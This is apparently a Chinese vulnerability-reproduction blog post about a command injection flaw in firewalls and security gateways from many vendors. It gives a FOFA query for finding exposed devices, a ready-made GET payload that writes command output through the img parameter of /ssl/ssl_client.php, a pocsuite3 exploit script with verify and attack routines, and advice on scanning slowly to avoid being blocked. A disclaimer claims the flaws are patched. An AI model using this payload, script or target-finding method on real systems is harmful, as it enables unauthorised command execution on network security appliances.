漏洞复现-多个产商安全产品存在命令执行poc(附漏洞检测脚本)

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

多个产商安全产品存在命令执行,攻击者可通过此漏洞获取服务器权限。

漏洞影响内容

H3C-下一代防火墙

安恒信息-明御安全网关

MAiPU-安全网关

D_Link-下一代防火墙

HUAWEI-公司产品

迈普通信技术股份有限公司安全网关

博达通信-下一代防火墙

任天行网络安全管理系统\安全审计系统

安博通应用网关

烽火网络安全审计

瑞斯康达科技发展股份有限公司安全路由器

任子行网络安全审计系统

绿盟安全审计系统

深圳市鑫塔科技有限公司第二代防火墙

fofa语句

body="/webui/images/default/default/alert_close.jpg"

poc语句加检测

poc语句

GET /ssl/ssl_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/ssl/ceshi.txt|ls HTTP/1.1

漏洞复现-多个产商安全产品存在命令执行poc(附漏洞检测脚本)_第1张图片

一般出现这个页面就表示漏洞利用成功,可以去ip/ssl/cheshi页面查看whoami内容

漏洞复现-多个产商安全产品存在命令执行poc(附漏洞检测脚本)_第2张图片

不过因为是安全设备,你扫快了扫多了,会直接g的

漏洞复现-多个产商安全产品存在命令执行poc(附漏洞检测脚本)_第3张图片

这个是同一个页面,因为在写脚本的时候多次测试,直接显示404了。

poc脚本

脚本用的pocsuite框架

# -*- coding: utf-8 -*-
# 2023/12/7 11:59

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
from pocsuite3.api import OrderedDict, OptString


class Multiple_vendors_RCE(POCBase):
    author = '炼金术师诸葛亮'
    createDate = '2023-12-7'
    name = 'Multiple-vendors-RCE'
    appName = 'Multiple-vendors-RCE'
    vulType = 'Command Execution'  # 漏洞类型,参见漏洞类型规范表
    desc = '多个产商安全产品存在命令执行,攻击者可通过此漏洞获取服务器权限。'  # 漏洞简要描述

    def _verify(self):
        result = {}
        path = "/ssl/ssl_client.php"  # 参数
        url = self.url + path
        payload = "?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/ssl/ceshi.txt|ls"  # payload
        r = requests.get(url + payload)
        print(r.text)
        # 验证成功输出相关信息
        if r and r.status_code == 200 and "whoami" in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Name'] = payload

        return self.parse_output(result)

    def _attack(self):
        result = {}
        path = "/ssl/ceshi.php"
        url = self.url + path
        headers={
            'Cache-Control': 'max-age=0',
            'Sec-Ch-Ua': '"Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"',
            'Sec-Ch-Ua-Mobile': '?0',
            'Sec-Ch-Ua-Platform': '"Windows"',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'Sec-Fetch-Site': 'none',
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '?1',
            'Sec-Fetch-Dest': 'document',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'close'
        }

        r = requests.get(url,headers=headers)
        if r and r.status_code == 200 and "www" in r.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Resp'] = r.text

        return self.parse_output(result)

register_poc(Multiple_vendors_RCE)

脚本使用

漏洞复现-多个产商安全产品存在命令执行poc(附漏洞检测脚本)_第4张图片

你可能感兴趣的:(安全,web安全)